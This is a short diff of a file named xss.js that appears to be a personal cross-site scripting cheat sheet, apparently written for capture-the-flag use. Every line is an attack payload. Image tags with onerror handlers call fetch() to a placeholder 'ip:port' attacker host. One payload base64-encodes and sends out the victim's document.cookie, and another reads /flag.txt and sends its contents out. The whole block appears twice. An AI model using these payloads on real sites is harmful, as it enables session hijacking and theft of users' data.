Reelix · January 1, 2025 21:22
diff --git a/xss.js b/xss.js
 // Test For Image
 <img src='http://ip:port/xss' />

 // Test For Fetch
 <img src=x onerror=fetch('http://ip:port/xss2') />

 // Fetch Cookie Stealing
 <img src=x onerror=fetch('http://ip:port/cookie?cookie='+btoa(document.cookie)) />

 // Fetch entire page contents
 // Note: "'s are required (Chained promises)
 <img src=x onerror="fetch('/flag.txt').then(r=>r.text()).then(d=>fetch('ip:port/data?d='+btoa(d)))">
	// Test For Image
	<img src='http://ip:port/xss' />

	// Test For Fetch
	<img src=x onerror=fetch('http://ip:port/xss2') />

	// Fetch Cookie Stealing
	<img src=x onerror=fetch('http://ip:port/cookie?cookie='+btoa(document.cookie)) />

	// Fetch entire page contents
	// Note: "'s are required (Chained promises)
	<img src=x onerror="fetch('/flag.txt').then(r=>r.text()).then(d=>fetch('ip:port/data?d='+btoa(d)))">